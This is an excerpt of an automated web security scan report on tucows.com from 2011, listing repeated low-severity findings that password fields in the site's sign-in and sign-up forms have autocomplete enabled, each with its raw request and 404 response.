Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:42 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signup" style="visibility: hidden;">
               <form id="signupform" name="signupform" method="POST" action="javascript:void(null);" onsubmit="submitSignup(this);">
                   <div class='Clear bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...
<br />
                           <input type="password" name="pwc" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

14.62. http://www.tucows.com/images/newassets/includes/js/signupin.js  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/signupin.js

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /images/newassets/includes/js/signupin.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:42 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signin" style="visibility: hidden;">
               <form id="signinform" method="POST" action="javascript:void(null);" onsubmit="submitSignin(this);">
                   <div class='bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

14.63. http://www.tucows.com/images/newassets/includes/js/x_core.js  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/x_core.js

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /images/newassets/includes/js/x_core.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:30 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signup" style="visibility: hidden;">
               <form id="signupform" name="signupform" method="POST" action="javascript:void(null);" onsubmit="submitSignup(this);">
                   <div class='Clear bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...
<br />
                           <input type="password" name="pwc" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

14.64. http://www.tucows.com/images/newassets/includes/js/x_core.js  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/x_core.js

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /images/newassets/includes/js/x_core.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:30 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signin" style="visibility: hidden;">
               <form id="signinform" method="POST" action="javascript:void(null);" onsubmit="submitSignin(this);">
                   <div class='bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

14.65. http://www.tucows.com/images/newassets/includes/js/xdocsize.js  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/xdocsize.js

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /images/newassets/includes/js/xdocsize.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:35 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signin" style="visibility: hidden;">
               <form id="signinform" method="POST" action="javascript:void(null);" onsubmit="submitSignin(this);">
                   <div class='bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

14.66. http://www.tucows.com/images/newassets/includes/js/xdocsize.js  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/xdocsize.js

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /images/newassets/includes/js/xdocsize.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:35 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signup" style="visibility: hidden;">
               <form id="signupform" name="signupform" method="POST" action="javascript:void(null);" onsubmit="submitSignup(this);">
                   <div class='Clear bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...
<br />
                           <input type="password" name="pwc" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

14.67. http://www.tucows.com/images/newassets/includes/js/yetii.js  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/yetii.js

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /images/newassets/includes/js/yetii.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:25 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signup" style="visibility: hidden;">
               <form id="signupform" name="signupform" method="POST" action="javascript:void(null);" onsubmit="submitSignup(this);">
                   <div class='Clear bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...
<br />
                           <input type="password" name="pwc" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

14.68. http://www.tucows.com/images/newassets/includes/js/yetii.js  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/yetii.js

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /images/newassets/includes/js/yetii.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:25 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signin" style="visibility: hidden;">
               <form id="signinform" method="POST" action="javascript:void(null);" onsubmit="submitSignin(this);">
                   <div class='bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

14.69. http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/style.css  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/themes/03BlueMeany/style.css

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /images/newassets/includes/themes/03BlueMeany/style.css HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:20 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signup" style="visibility: hidden;">
               <form id="signupform" name="signupform" method="POST" action="javascript:void(null);" onsubmit="submitSignup(this);">
                   <div class='Clear bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...
<br />
                           <input type="password" name="pwc" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

14.70. http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/style.css  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/themes/03BlueMeany/style.css

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /images/newassets/includes/themes/03BlueMeany/style.css HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:20 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signin" style="visibility: hidden;">
               <form id="signinform" method="POST" action="javascript:void(null);" onsubmit="submitSignin(this);">
                   <div class='bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

14.71. http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/styles.css  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/themes/03BlueMeany/styles.css

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /images/newassets/includes/themes/03BlueMeany/styles.css HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:20 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signin" style="visibility: hidden;">
               <form id="signinform" method="POST" action="javascript:void(null);" onsubmit="submitSignin(this);">
                   <div class='bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

14.72. http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/styles.css  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/themes/03BlueMeany/styles.css

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /images/newassets/includes/themes/03BlueMeany/styles.css HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:20 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signup" style="visibility: hidden;">
               <form id="signupform" name="signupform" method="POST" action="javascript:void(null);" onsubmit="submitSignup(this);">
                   <div class='Clear bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...
<br />
                           <input type="password" name="pwc" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

14.73. http://www.tucows.com/images/newassets/javascript:void(null)  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/javascript:void(null)

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /images/newassets/javascript:void(null) HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
